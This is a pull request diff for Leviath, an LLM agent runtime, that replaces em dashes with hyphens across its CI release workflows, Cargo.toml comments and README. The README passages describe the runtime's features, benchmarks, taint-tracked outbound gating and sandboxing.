### PR TITLE
style: em dashes out, invariants in

### DIFF
--- a/.github/dependabot.yml
+++ b/.github/dependabot.yml
@@ -2,10 +2,10 @@ version: 2
 
 # Two ecosystems, because both are part of the attack surface:
 #
-# - `cargo` — the ~370 transitive crates that end up in the shipped binary. Now
+# - `cargo` - the ~370 transitive crates that end up in the shipped binary. Now
 #   that Cargo.lock is committed, these updates arrive as reviewable diffs
 #   instead of happening invisibly on every CI run.
-# - `github-actions` — the actions that build and publish releases. These run
+# - `github-actions` - the actions that build and publish releases. These run
 #   with `contents: write` on the release path, so a compromised action is a
 #   compromised release.
 updates:

--- a/.github/workflows/alpha.yml
+++ b/.github/workflows/alpha.yml
@@ -85,8 +85,8 @@ jobs:
       #
       # It has to be spelled here rather than in `.cargo/config.toml`: the
       # `RUSTFLAGS` *environment variable* set at the top of this workflow
-      # completely OVERRIDES `build.rustflags` from a config file — it does not
-      # merge — so hardening flags added there would apply to local builds and be
+      # completely OVERRIDES `build.rustflags` from a config file - it does not
+      # merge - so hardening flags added there would apply to local builds and be
       # silently dropped from exactly the release builds that need them.
       #
       # What each does, per platform:

--- a/.github/workflows/beta.yml
+++ b/.github/workflows/beta.yml
@@ -40,8 +40,8 @@ jobs:
           gh release download alpha --pattern "COMMIT_SHA" --dir /tmp/alpha/ 2>/dev/null || true
           if [ -f /tmp/alpha/COMMIT_SHA ]; then
             sha=$(cat /tmp/alpha/COMMIT_SHA)
-            # From a release asset — attacker-controlled for anyone who can write
-            # a release — and it becomes the published release's
+            # From a release asset - attacker-controlled for anyone who can write
+            # a release - and it becomes the published release's
             # `target_commitish`. Pin its shape before it is used.
             if ! printf '%s' "$sha" | grep -Eq '^[0-9a-f]{40}$'; then
               echo "ERROR: COMMIT_SHA in the alpha release is not a 40-hex commit id."
@@ -74,7 +74,7 @@ jobs:
           if [ -f release/SHA256SUMS ]; then
             (cd release && grep -v '^SHA256SUMS$' SHA256SUMS | sha256sum -c -)
           else
-            echo "ERROR: no SHA256SUMS in the alpha release — refusing to promote unverified binaries."
+            echo "ERROR: no SHA256SUMS in the alpha release - refusing to promote unverified binaries."
             exit 1
           fi
 

--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -112,7 +112,7 @@ jobs:
 
       # The lockfile is the point of the job above, so prove it is actually
       # current. `--locked` fails if Cargo.toml and Cargo.lock disagree, which
-      # catches a dependency edit committed without the lockfile update — the
+      # catches a dependency edit committed without the lockfile update - the
       # exact case that would silently reintroduce floating resolution.
       - name: Verify Cargo.lock is up to date
         run: cargo metadata --locked --format-version 1 > /dev/null
@@ -137,14 +137,14 @@ jobs:
   # own thresholds: `cargo xtask coverage --package <pkg>` runs `cargo llvm-cov
   # --package <pkg> --fail-under-{lines,functions,regions} 100`, failing the job
   # if that package is below 100% (see xtask/src/coverage.rs). No custom
-  # parsing/merging/aggregation — llvm-cov does the counting and the gating.
+  # parsing/merging/aggregation - llvm-cov does the counting and the gating.
   #
   # Per-PACKAGE (not `--workspace`) is deliberate: `-C instrument-coverage`
-  # records every function in every binary that links it — including binaries
-  # that never call it — so the whole-workspace merge lets a never-run record
+  # records every function in every binary that links it - including binaries
+  # that never call it - so the whole-workspace merge lets a never-run record
   # shadow the covered one and reads genuinely-tested code below 100%. One
   # package at a time keeps llvm-cov's counts accurate (see coverage.rs + the
-  # upstream LLVM bug it links). Branch coverage is not collected — `--branch`
+  # upstream LLVM bug it links). Branch coverage is not collected - `--branch`
   # reliably SIGSEGVs on that same bug. `cargo-llvm-cov` is installed from a
   # prebuilt binary via taiki-e/install-action.
   coverage:
@@ -156,7 +156,7 @@ jobs:
       matrix:
         os: [ubuntu-latest, macos-latest, windows-latest]
         # The workspace members `parse_workspace_packages` returns (xtask
-        # excluded — it is the coverage tool, not measured by the gate).
+        # excluded - it is the coverage tool, not measured by the gate).
         package:
           - leviath-core
           - leviath-runtime
@@ -196,7 +196,7 @@ jobs:
   # runs once every package on every OS gated green, so its success == the whole
   # workspace is 100%. It keeps the stable `Coverage gate (<os>)` check name and
   # publishes the coverage badges (from ubuntu on push to main). Because the gate
-  # is hard-100%, a green run means 100% by construction — the badges are static.
+  # is hard-100%, a green run means 100% by construction - the badges are static.
   coverage-gate:
     name: Coverage gate (${{ matrix.os }})
     needs: [coverage]
@@ -241,7 +241,7 @@ jobs:
 
   # The zero-exclusions policy scan runs once (it's OS-independent). It uses
   # ast-grep, which matches Rust/YAML *structurally* (via tree-sitter) rather
-  # than by raw text — so a `#[cfg(not(test))]` attribute is caught but a
+  # than by raw text - so a `#[cfg(not(test))]` attribute is caught but a
   # backtick mention of it inside a doc comment is not. Rules live in
   # `.sgrules/` (see `sgconfig.yml`). Explicit scan paths are required because
   # `.github/` is a hidden directory that a bare `ast-grep scan` would skip.
@@ -267,14 +267,14 @@ jobs:
           printf '#[cfg(not(test))]\nfn __probe() {}\n' > "$probe"
           if ast-grep scan crates xtask .github/workflows; then
             rm -f "$probe"
-            echo "::error::ast-grep did NOT catch a planted #[cfg(not(test))] — the suppression lint is misconfigured (bad rules or scan paths)."
+            echo "::error::ast-grep did NOT catch a planted #[cfg(not(test))] - the suppression lint is misconfigured (bad rules or scan paths)."
             exit 1
           fi
           rm -f "$probe"
           echo "Suppression lint confirmed: the planted probe was caught."
 
   # `crates/leviath-cli/src/main.rs` is the ONE file excluded from coverage
-  # measurement — the thin, un-unit-tested composition root where real terminal
+  # measurement - the thin, un-unit-tested composition root where real terminal
   # / stdin / port / subprocess / `/dev/tty` I/O is wired into the tested lib
   # cores. Changing it needs deliberate maintainer sign-off: this job fails any
   # PR that touches main.rs unless the maintainer applies the

--- a/.github/workflows/prod.yml
+++ b/.github/workflows/prod.yml
@@ -124,7 +124,7 @@ jobs:
           if [ -f release/SHA256SUMS ]; then
             (cd release && grep -v '^SHA256SUMS$' SHA256SUMS | sha256sum -c -)
           else
-            echo "ERROR: no SHA256SUMS in the beta release — refusing to promote unverified binaries."
+            echo "ERROR: no SHA256SUMS in the beta release - refusing to promote unverified binaries."
             exit 1
           fi
 
@@ -156,7 +156,7 @@ jobs:
           target_commitish: ${{ needs.check-beta.outputs.sha }}
           name: "Leviath ${{ env.VERSION }}"
           body: |
-            **Stable release** — ${{ env.VERSION }}
+            **Stable release** - ${{ env.VERSION }}
 
             Source commit: ${{ needs.check-beta.outputs.sha }}
 

--- a/.github/workflows/revert.yml
+++ b/.github/workflows/revert.yml
@@ -91,7 +91,7 @@ jobs:
           if [ -f release/SHA256SUMS ]; then
             (cd release && grep -v '^SHA256SUMS$' SHA256SUMS | sha256sum -c -)
           else
-            echo "ERROR: no SHA256SUMS in $TARGET_TAG — refusing to republish unverified binaries."
+            echo "ERROR: no SHA256SUMS in $TARGET_TAG - refusing to republish unverified binaries."
             exit 1
           fi
 

--- a/Cargo.toml
+++ b/Cargo.toml
@@ -21,7 +21,7 @@ edition = "2024"
 license = "MIT"
 authors = ["Gerald McAlister <gemisis@gmail.com>"]
 repository = "https://github.com/Sun-Forge-AI/leviath"
-description = "A structured agent runtime for LLMs — context memory, multi-stage workflows, and ECS-based orchestration"
+description = "A structured agent runtime for LLMs - context memory, multi-stage workflows, and ECS-based orchestration"
 
 # Lints applied to every workspace member that opts in with `[lints] workspace = true`.
 # `unsafe_code = "forbid"` is a hard compile error that cannot be re-enabled by a
@@ -68,7 +68,7 @@ clap = { version = "4.5", features = ["derive"] }
 # aarch64-linux release target cross-compile without an OpenSSL sysroot.
 # native-roots so system/corporate CA stores are still honored.
 # TLS is rustls, never native-tls: one audited implementation on every platform
-# rather than whatever the OS ships. 0.13 renamed the features —
+# rather than whatever the OS ships. 0.13 renamed the features -
 # `rustls-tls-native-roots` became `rustls` + `rustls-native-certs`, and
 # `macos-system-configuration` became `system-proxy`. `form` and `query`, which
 # used to be always-on, are now opt-in.
@@ -115,7 +115,7 @@ temp-env = "0.3"
 #
 # Re-checked against ratatui 0.30.2 / crossterm 0.29: still blocked, same
 # boundary. 0.30 additionally gives `Backend` an associated `Error` type, so the
-# wizard's generic bounds need `Send + Sync` added — small, but pointless until
+# wizard's generic bounds need `Send + Sync` added - small, but pointless until
 # tui-textarea moves.
 crossterm = "0.28"
 ratatui = "0.29"
@@ -131,8 +131,8 @@ tower-http = { version = "0.7", features = ["cors"] }
 # ── Release profile ──────────────────────────────────────────────────────────
 #
 # There was no `[profile.release]` at all, so shipped binaries used cargo's
-# defaults: no LTO, 16 codegen units, full symbol table, and — the one that
-# matters for correctness — arithmetic overflow wrapping silently.
+# defaults: no LTO, 16 codegen units, full symbol table, and - the one that
+# matters for correctness - arithmetic overflow wrapping silently.
 [profile.release]
 # Overflow panics instead of wrapping. This workspace already treats
 # index/arithmetic mistakes as a real class of bug rather than a theoretical one
@@ -159,7 +159,7 @@ strip = "symbols"
 # The daemon depends on unwinding. Rhai host functions are wrapped in
 # `catch_unwind` (`leviath_scripting::tool::guard_str`/`guard_dyn`) so that a
 # panic inside a native function registered with the script engine becomes an
-# ordinary script error instead of taking the whole daemon down — that was issue
+# ordinary script error instead of taking the whole daemon down - that was issue
 # #109, where a byte-boundary panic inside `decode_entities` aborted the process
 # for every running agent. `panic = "abort"` would remove that safety net and
 # reinstate the bug. The same applies to the pipeline's per-system panic

--- a/README.md
+++ b/README.md
@@ -4,7 +4,7 @@
 
 **A structured agent runtime for LLMs**
 
-Structured memory, multi-stage workflows, and an ECS engine — so agents stay coherent
+Structured memory, multi-stage workflows, and an ECS engine - so agents stay coherent
 on long tasks, use the right model for each phase, and don't melt your machine when
 you run a dozen at once.
 
@@ -22,7 +22,7 @@ you run a dozen at once.
 
 ---
 
-Most agent tools hand an LLM a flat message array and hope for the best. Leviath gives it **structure** — so it stays coherent across hundreds of tool calls, uses the right model for each phase of a task, and runs dozens of agents in a single process instead of one OS process each.
+Most agent tools hand an LLM a flat message array and hope for the best. Leviath gives it **structure** - so it stays coherent across hundreds of tool calls, uses the right model for each phase of a task, and runs dozens of agents in a single process instead of one OS process each.
 
 Pick a pre-built agent or write your own, run it, and watch it actually remember what it read 50 tool calls ago.
 
@@ -32,26 +32,26 @@ Pick a pre-built agent or write your own, run it, and watch it actually remember
 
 ## 📋 Requirements
 
-- An API key from [Anthropic](https://console.anthropic.com/), [OpenAI](https://platform.openai.com/), [Google AI](https://aistudio.google.com/), or [OpenRouter](https://openrouter.ai/) — or, with no key at all, run [Ollama](https://ollama.com) locally or use the Claude Code transport below
+- An API key from [Anthropic](https://console.anthropic.com/), [OpenAI](https://platform.openai.com/), [Google AI](https://aistudio.google.com/), or [OpenRouter](https://openrouter.ai/) - or, with no key at all, run [Ollama](https://ollama.com) locally or use the Claude Code transport below
 - macOS, Linux, or Windows
-- No runtime dependencies — a single binary, no Node/Python/Docker required
+- No runtime dependencies - a single binary, no Node/Python/Docker required
 
-> **Claude Code transport (opt-in):** if you have [Claude Code](https://claude.com/claude-code) installed and signed in, enable it in `lev setup` to run Leviath on your Claude subscription with no API key. Leviath's structured regions work normally — it drives the CLI as a plain inference relay, keeping the context window, the tool loop, and the iteration count on Leviath's side.
+> **Claude Code transport (opt-in):** if you have [Claude Code](https://claude.com/claude-code) installed and signed in, enable it in `lev setup` to run Leviath on your Claude subscription with no API key. Leviath's structured regions work normally - it drives the CLI as a plain inference relay, keeping the context window, the tool loop, and the iteration count on Leviath's side.
 >
-> Caveats, measured rather than estimated: the CLI adds ~130 tokens of its own context to **every** call, including **your account email address** and the current date. This cannot be disabled — every flag that suppresses it also disables subscription auth. There is no prompt caching, and each call spawns a subprocess (~200 ms). Anthropic models only. For full control over what reaches the model, use a direct provider.
+> Caveats, measured rather than estimated: the CLI adds ~130 tokens of its own context to **every** call, including **your account email address** and the current date. This cannot be disabled - every flag that suppresses it also disables subscription auth. There is no prompt caching, and each call spawns a subprocess (~200 ms). Anthropic models only. For full control over what reaches the model, use a direct provider.
 
 ## 🚀 Quick Start
 
 ### 1. Install
 
-> **Private alpha:** the repo and its releases are currently private, so installing needs a GitHub Personal Access Token (`repo` scope) — exported as `GITHUB_TOKEN` for the install scripts, and `HOMEBREW_GITHUB_API_TOKEN` for Homebrew. The [distribution repo](https://github.com/Sun-Forge-AI/leviath-dist) has the one-time token setup and full instructions.
+> **Private alpha:** the repo and its releases are currently private, so installing needs a GitHub Personal Access Token (`repo` scope) - exported as `GITHUB_TOKEN` for the install scripts, and `HOMEBREW_GITHUB_API_TOKEN` for Homebrew. The [distribution repo](https://github.com/Sun-Forge-AI/leviath-dist) has the one-time token setup and full instructions.
 
 **macOS (Homebrew):**
 
 ```bash
 brew tap sun-forge-ai/leviath https://github.com/Sun-Forge-AI/leviath-dist.git
 brew trust sun-forge-ai/leviath          # newer Homebrew requires trusting third-party taps
-brew install leviath                     # stable — or: leviath-beta, leviath-alpha
+brew install leviath                     # stable - or: leviath-beta, leviath-alpha
 ```
 
 **Linux:**
@@ -78,7 +78,7 @@ cargo install --git https://github.com/Sun-Forge-AI/leviath.git --bin lev
 
 ### 2. Configure a provider
 
-You need at least one LLM provider. The interactive wizard walks you through API keys for Anthropic, OpenAI, or OpenRouter — or pointing at a local [Ollama](https://ollama.com) instance (no key needed):
+You need at least one LLM provider. The interactive wizard walks you through API keys for Anthropic, OpenAI, or OpenRouter - or pointing at a local [Ollama](https://ollama.com) instance (no key needed):
 
 ```bash
 lev setup
@@ -103,7 +103,7 @@ lev run deep-researcher --task "Survey the current state of solid-state battery 
 one shared world, so runs keep going after your terminal closes. The daemon
 starts automatically on first use (run it yourself with `lev daemon` to watch its
 logs). For unattended, long-running agents, `lev daemon install` hands it to the
-OS supervisor — launchd on macOS, a systemd `--user` unit on Linux — so it starts
+OS supervisor - launchd on macOS, a systemd `--user` unit on Linux - so it starts
 at login and comes back on its own if it ever dies; on the next start it reloads
 every interrupted run. Inspect and steer running agents from any terminal:
 
@@ -129,7 +129,7 @@ cd my-agent
 lev run . --task "Your task here"
 ```
 
-This writes an `agent.leviath` config you can customize — models per stage, context regions, tools, and workflow graph. See [agent configuration →](https://leviath.dev/docs/agents)
+This writes an `agent.leviath` config you can customize - models per stage, context regions, tools, and workflow graph. See [agent configuration →](https://leviath.dev/docs/agents)
 
 Region budgets can be expressed as **percentages of the model's context window** so a
 blueprint's intent ("implementation gets the bulk") stays correct across models of
@@ -160,7 +160,7 @@ plan         = { kind = "pinned", budget = "20%" }
 
 **🧠 Structured Context Memory**
 
-Six region types with deterministic eviction — architecture stays pinned, tool results evict first, conversation auto-compacts into summaries. Route reads to specific regions so a file dump can't push out your system prompt.
+Six region types with deterministic eviction - architecture stays pinned, tool results evict first, conversation auto-compacts into summaries. Route reads to specific regions so a file dump can't push out your system prompt.
 
 [Learn more →](https://leviath.dev/docs/context)
 
@@ -169,9 +169,9 @@ Six region types with deterministic eviction — architecture stays pinned, tool
 
 **🔀 Multi-Stage Workflows**
 
-Each stage gets its own model, tools, and context layout. Run them linearly or as a [directed graph](https://leviath.dev/docs/stages#graph) with conditional transitions, error recovery, and LLM-driven routing — check it with `lev validate`.
+Each stage gets its own model, tools, and context layout. Run them linearly or as a [directed graph](https://leviath.dev/docs/stages#graph) with conditional transitions, error recovery, and LLM-driven routing - check it with `lev validate`.
 
-A `stuck` edge escapes a stage that is making no progress — measured, not self-reported, so it fires even when the agent hasn't noticed:
+A `stuck` edge escapes a stage that is making no progress - measured, not self-reported, so it fires even when the agent hasn't noticed:
 
 ```toml
 [stages.implement.transitions.reassess]
@@ -182,7 +182,7 @@ stuck_after_same_file_edits = 5    # write/edit calls against one path
 stuck_after_tool_calls      = 60   # tool calls in this stage
 ```
 
-Set any subset — whichever trips first wins, and each stage arms its own. The runtime writes *why* into the target stage's context.
+Set any subset - whichever trips first wins, and each stage arms its own. The runtime writes *why* into the target stage's context.
 
 [Learn more →](https://leviath.dev/docs/stages)
 
@@ -202,7 +202,7 @@ Agents run as entities in a [bevy_ecs](https://bevyengine.org/) world. Dozens sh
 
 **🧬 Sub-Agents & Fan-Out**
 
-Agents spawn children with different blueprints. A **fan-out** stage splits a task into work items and runs one sub-agent worker per item concurrently (bounded by `max_workers`), then merges their results back into the parent — all in the same process, over one shared lock-free inference driver. Any sub-agent, at any depth, can ask the user questions directly — no fire-and-forget, no routing through the parent.
+Agents spawn children with different blueprints. A **fan-out** stage splits a task into work items and runs one sub-agent worker per item concurrently (bounded by `max_workers`), then merges their results back into the parent - all in the same process, over one shared lock-free inference driver. Any sub-agent, at any depth, can ask the user questions directly - no fire-and-forget, no routing through the parent.
 
 [Learn more →](https://leviath.dev/docs/sub-agents)
 
@@ -211,14 +211,14 @@ Agents spawn children with different blueprints. A **fan-out** stage splits a ta
 
 **🙋 Human-in-the-Loop**
 
-Message a running agent from the terminal or dashboard — input is injected between inference calls, so you redirect, answer, or add constraints without restarting. Force checkpoints with a stage's `interaction_points` — approve, request revisions, or **edit the agent's output directly** (e.g. tweak the plan before it's implemented, and your edits stick through later revisions) — or grant `ask_user_*` tools so the agent asks on its own judgment. All gated by per-stage tool permissions.
+Message a running agent from the terminal or dashboard - input is injected between inference calls, so you redirect, answer, or add constraints without restarting. Force checkpoints with a stage's `interaction_points` - approve, request revisions, or **edit the agent's output directly** (e.g. tweak the plan before it's implemented, and your edits stick through later revisions) - or grant `ask_user_*` tools so the agent asks on its own judgment. All gated by per-stage tool permissions.
 
 </td>
 <td width="33%" valign="top">
 
 **🛡️ Taint-Tracked Data Flow**
 
-A deterministic sensitivity model (Public / Internal / Private) tags every context region — set by the runtime, never by model output. Tools declare a direction and clearance, so an outbound call carrying data above its level is blocked before it fires — returned as `[blocked]`, or, in the daemon, surfaced as an *allow once / allow for this session / deny* prompt — and taint recovers automatically as entries evict. Every tool that can carry bytes off the machine is Outbound and therefore gated — `shell`, `web_fetch`, `http_get`/`http_post`, and any MCP or script tool, since an unrecognized tool fails closed rather than open. Configure it with an opt-in `[security]` block, layer on allowlists and Rhai policy rules, and dry-run any tool with `lev policy test`. An agent's own manifest can turn tracking *on*, never off.
+A deterministic sensitivity model (Public / Internal / Private) tags every context region - set by the runtime, never by model output. Tools declare a direction and clearance, so an outbound call carrying data above its level is blocked before it fires - returned as `[blocked]`, or, in the daemon, surfaced as an *allow once / allow for this session / deny* prompt - and taint recovers automatically as entries evict. Every tool that can carry bytes off the machine is Outbound and therefore gated - `shell`, `web_fetch`, `http_get`/`http_post`, and any MCP or script tool, since an unrecognized tool fails closed rather than open. Configure it with an opt-in `[security]` block, layer on allowlists and Rhai policy rules, and dry-run any tool with `lev policy test`. An agent's own manifest can turn tracking *on*, never off.
 
 </td>
 </tr>
@@ -227,9 +227,9 @@ A deterministic sensitivity model (Public / Internal / Private) tags every conte
 
 **📦 Sandboxed Tool Execution**
 
-By default an agent's shell commands run **directly on your machine** — no runtime, nothing to install. Opt in per agent *or* per stage to route them into an isolated environment instead: a **container** (Docker, Podman, or any Docker-CLI-compatible engine — Leviath isn't prescriptive) or a fresh set of Linux **namespaces** (no runtime needed). Run analysis on the host and implementation in a networkless container. The daemon creates a warm container per agent and tears it down at reap, so no orphans; file tools keep working over the bind-mounted workdir.
+By default an agent's shell commands run **directly on your machine** - no runtime, nothing to install. Opt in per agent *or* per stage to route them into an isolated environment instead: a **container** (Docker, Podman, or any Docker-CLI-compatible engine - Leviath isn't prescriptive) or a fresh set of Linux **namespaces** (no runtime needed). Run analysis on the host and implementation in a networkless container. The daemon creates a warm container per agent and tears it down at reap, so no orphans; file tools keep working over the bind-mounted workdir.
 
-Containers drop every capability, forbid privilege regain, and are bounded in processes and memory. `namespace` is the lighter option and a narrower one: it isolates PIDs and, with `network = false`, connectivity — but it **shares the host root filesystem**, so it is not a filesystem sandbox. Choose `container` when the goal is to contain what an agent can reach. An installed agent can tighten either but never turn one off.
+Containers drop every capability, forbid privilege regain, and are bounded in processes and memory. `namespace` is the lighter option and a narrower one: it isolates PIDs and, with `network = false`, connectivity - but it **shares the host root filesystem**, so it is not a filesystem sandbox. Choose `container` when the goal is to contain what an agent can reach. An installed agent can tighten either but never turn one off.
 
 ```toml
 [sandbox]
@@ -248,7 +248,7 @@ network = false      # isolate this stage
 
 **🧭 Codebase Discovery & Workflow Synthesis**
 
-The coding agents open with a `discover` stage that answers *what is this codebase* and *how do I verify my work here* before a line is written — then writes a concrete verification workflow (`BASELINE` / `VERIFY` / `DONE WHEN`) into a pinned region. `implement` captures the baseline **before** its first edit and diffs every later run against it, so a test that used to pass and now fails is caught immediately instead of at review time. Both regions are `required`, so the runtime re-runs `discover` until they're actually populated — the workflow is a commitment the review stage holds the run to, not a suggestion.
+The coding agents open with a `discover` stage that answers *what is this codebase* and *how do I verify my work here* before a line is written - then writes a concrete verification workflow (`BASELINE` / `VERIFY` / `DONE WHEN`) into a pinned region. `implement` captures the baseline **before** its first edit and diffs every later run against it, so a test that used to pass and now fails is caught immediately instead of at review time. Both regions are `required`, so the runtime re-runs `discover` until they're actually populated - the workflow is a commitment the review stage holds the run to, not a suggestion.
 
 Seed a region from a command so discovery starts from facts instead of `ls`:
 
@@ -258,7 +258,7 @@ repo_files = { kind = "pinned", max_tokens = 4000,
                seed = { command = "git ls-files" } }
 ```
 
-⚠️ A command seed runs **at spawn — before the first inference, and so before any tool-approval prompt**. It is confined to the workdir, routed through the entry stage's sandbox when one is configured, and capped in time and output size; a failure is non-fatal unless the region is `required`. `lev validate <agent>` prints every command seed so you can audit an agent before installing it. Refuse them per-run with `--no-seed-commands`, or machine-wide:
+⚠️ A command seed runs **at spawn - before the first inference, and so before any tool-approval prompt**. It is confined to the workdir, routed through the entry stage's sandbox when one is configured, and capped in time and output size; a failure is non-fatal unless the region is `required`. `lev validate <agent>` prints every command seed so you can audit an agent before installing it. Refuse them per-run with `--no-seed-commands`, or machine-wide:
 
 ```toml
 [security]
@@ -273,11 +273,11 @@ allow_seed_commands = false
 
 ### Why these benchmarks exist
 
-Leviath is **not** a replacement for Claude Code, Codex, or any other coding agent — it's a runtime that orchestrates them. Today, orchestration tools that need multiple agents (parallel issue fixing, decomposed tasks, review loops) typically spawn each one as a **separate OS process**. That works, but it means every agent carries the full weight of a Node.js or Go runtime, and every agent manages its own flat context window — re-reading files, losing specs to eviction, and burning tokens.
+Leviath is **not** a replacement for Claude Code, Codex, or any other coding agent - it's a runtime that orchestrates them. Today, orchestration tools that need multiple agents (parallel issue fixing, decomposed tasks, review loops) typically spawn each one as a **separate OS process**. That works, but it means every agent carries the full weight of a Node.js or Go runtime, and every agent manages its own flat context window - re-reading files, losing specs to eviction, and burning tokens.
 
 Leviath addresses both problems:
-1. **Structured context** — regions prevent important information from being evicted, cutting redundant reads and token waste
-2. **ECS engine** — all agents share a single Rust process, so spinning up 10 agents doesn't mean 10× the device RAM
+1. **Structured context** - regions prevent important information from being evicted, cutting redundant reads and token waste
+2. **ECS engine** - all agents share a single Rust process, so spinning up 10 agents doesn't mean 10× the device RAM
 
 These benchmarks measure each claim independently.
 
@@ -285,11 +285,11 @@ These benchmarks measure each claim independently.
 
 ### Context Quality: Structured vs Flat
 
-Both approaches build the same 12-file multi-tenant event processing platform from 11 spec files and 4 config files. Same model (Claude Sonnet 5), same tools, same task. Quality is measured by a **hidden validation suite** of 69 tests the agent never sees — no self-grading.
+Both approaches build the same 12-file multi-tenant event processing platform from 11 spec files and 4 config files. Same model (Claude Sonnet 5), same tools, same task. Quality is measured by a **hidden validation suite** of 69 tests the agent never sees - no self-grading.
 
 <p align="center">
   <picture>
-    <img src="docs/benchmarks/hero-comparison.svg" alt="Leviath v3 vs Flat Baseline — headline metrics" width="800">
+    <img src="docs/benchmarks/hero-comparison.svg" alt="Leviath v3 vs Flat Baseline - headline metrics" width="800">
   </picture>
 </p>
 
@@ -306,13 +306,13 @@ Both approaches build the same 12-file multi-tenant event processing platform fr
 
 <p align="center">
   <picture>
-    <img src="docs/benchmarks/efficiency.svg" alt="Efficiency comparison — cost, tool calls, runtime" width="750">
+    <img src="docs/benchmarks/efficiency.svg" alt="Efficiency comparison - cost, tool calls, runtime" width="750">
   </picture>
 </p>
 
 </details>
 
-> **Context benchmark methodology:** The "flat baseline" is an independent Rust binary calling the same Anthropic API with the same tools and system prompt — no Leviath dependency, no shared code. Both approaches receive identical seed files and task descriptions. Results are averaged across multiple independent runs. Quality is measured by 69 hidden validation tests covering 13 categories (happy path, schema validation, auth, rate limiting, DLQ, etc.) that neither agent sees during the task. Full methodology and raw data: [leviath-benchmarks](https://github.com/Sun-Forge-AI/leviath-benchmarks).
+> **Context benchmark methodology:** The "flat baseline" is an independent Rust binary calling the same Anthropic API with the same tools and system prompt - no Leviath dependency, no shared code. Both approaches receive identical seed files and task descriptions. Results are averaged across multiple independent runs. Quality is measured by 69 hidden validation tests covering 13 categories (happy path, schema validation, auth, rate limiting, DLQ, etc.) that neither agent sees during the task. Full methodology and raw data: [leviath-benchmarks](https://github.com/Sun-Forge-AI/leviath-benchmarks).
 
 ---
 
@@ -320,27 +320,27 @@ Both approaches build the same 12-file multi-tenant event processing platform fr
 
 When orchestration tools run multiple agents, each one is typically its own OS process. Anthropic's own [Agent SDK hosting docs](https://code.claude.com/docs/en/agent-sdk/hosting.md) confirm: *"Running N concurrent sessions means N subprocesses, each with its own process tree."* This adds up fast.
 
-Leviath's ECS architecture runs all agents as entities in a single Rust process — no per-agent process overhead. We measured peak device RAM (RSS) for Leviath against four popular coding agents at 1, 3, 5, and 10 concurrent instances:
+Leviath's ECS architecture runs all agents as entities in a single Rust process - no per-agent process overhead. We measured peak device RAM (RSS) for Leviath against four popular coding agents at 1, 3, 5, and 10 concurrent instances:
 
 <p align="center">
   <picture>
-    <img src="docs/benchmarks/resource-footprint.svg" alt="Device RAM scaling — Leviath ECS vs process-per-agent tools" width="800">
+    <img src="docs/benchmarks/resource-footprint.svg" alt="Device RAM scaling - Leviath ECS vs process-per-agent tools" width="800">
   </picture>
 </p>
 
-At 10 concurrent agents, Leviath uses **18 MB** of device RAM vs. **3,209 MB** for Claude Code — **178× lighter**. All data points are measured, not projected.
+At 10 concurrent agents, Leviath uses **18 MB** of device RAM vs. **3,209 MB** for Claude Code - **178× lighter**. All data points are measured, not projected.
 
 > **Resource benchmark methodology:** Each tool was launched N times concurrently (same coding task, separate git-initialized temp directories). RSS was sampled every 1 second for 15 seconds after an 8-second warmup. Peak total RSS across all instances was recorded. All instances were verified alive at time of measurement. System: macOS 15.5, Apple Silicon, 16 GB. Tool versions: Claude Code 2.1.86, Codex CLI 0.144.1, Pi (latest), OpenCode 0.0.55. Leviath was measured via `lev serve` with tasks submitted through the API. Full data: [leviath-benchmarks](https://github.com/Sun-Forge-AI/leviath-benchmarks).
 >
-> **Note:** This compares the runtime footprint of the orchestration layer, not the inference cost or quality of each tool's underlying model. Claude Code, Codex, Pi, and OpenCode are excellent coding agents — the point is that wrapping them in a process-per-agent pattern has a measurable device cost that an ECS engine avoids.
+> **Note:** This compares the runtime footprint of the orchestration layer, not the inference cost or quality of each tool's underlying model. Claude Code, Codex, Pi, and OpenCode are excellent coding agents - the point is that wrapping them in a process-per-agent pattern has a measurable device cost that an ECS engine avoids.
 
 ## 🤖 Pre-built Agents
 
-Ten agents ship out of the box — each a multi-stage directed graph with structured context regions, per-stage model fallback (Anthropic → OpenAI → local), and error recovery. The research and writing agents also carry drop-in `web_search`/`web_fetch` script tools.
+Ten agents ship out of the box - each a multi-stage directed graph with structured context regions, per-stage model fallback (Anthropic → OpenAI → local), and error recovery. The research and writing agents also carry drop-in `web_search`/`web_fetch` script tools.
 
 Every agent also has an `error_recovery` stage (omitted from the graphs) that catches failed tool calls and hands back into the main flow. Diamonds are LLM-routed or human-in-the-loop decisions; dotted edges fire automatically on a runtime condition rather than by the agent's choice.
 
-The two coding agents can also detour through an optional **`prototype`** spike when the approach is uncertain — the planner elects it per task and folds what it learns back into the plan — and are pulled into **`reassess`** by a `stuck` edge when they burn turns or keep editing one file without progress.
+The two coding agents can also detour through an optional **`prototype`** spike when the approach is uncertain - the planner elects it per task and folds what it learns back into the plan - and are pulled into **`reassess`** by a `stuck` edge when they burn turns or keep editing one file without progress.
 
 <table>
 <tr><th align="left">Agent</th><th align="left">Workflow</th></tr>
@@ -357,7 +357,7 @@ The two coding agents can also detour through an optional **`prototype`** spike 
 <td><img src="docs/assets/agents/reviewer.svg" alt="reviewer workflow graph" width="520"></td>
 </tr>
 <tr>
-<td valign="middle" width="30%"><b>parallel-fixer</b><br>Fixing many failing tests at once — one worker per failure</td>
+<td valign="middle" width="30%"><b>parallel-fixer</b><br>Fixing many failing tests at once - one worker per failure</td>
 <td><img src="docs/assets/agents/parallel-fixer.svg" alt="parallel-fixer workflow graph" width="520"></td>
 </tr>
 <tr>
@@ -389,17 +389,17 @@ The two coding agents can also detour through an optional **`prototype`** spike 
 ## 🖥️ Dashboard
 
 <p align="center">
-  <img src="docs/assets/dashboard-final.png" alt="lev dash — the Leviath terminal dashboard showing the agent list and live activity log" width="900">
+  <img src="docs/assets/dashboard-final.png" alt="lev dash - the Leviath terminal dashboard showing the agent list and live activity log" width="900">
 </p>
 
-`lev dash` is a full TUI for managing concurrent agents: stage tabs, context-window visualization, markdown rendering, search/filter, sub-agent tree view, and full mouse support. Scroll with the wheel, or click-drag to select text in any pane; releasing the drag copies it to your clipboard (works over SSH via OSC52), and `y` still yanks a whole pane at once. Shift+drag reaches your terminal's native selection. Press **`m`** to open the MCP management screen — add, remove, log in to, and test tool servers without leaving the dashboard.
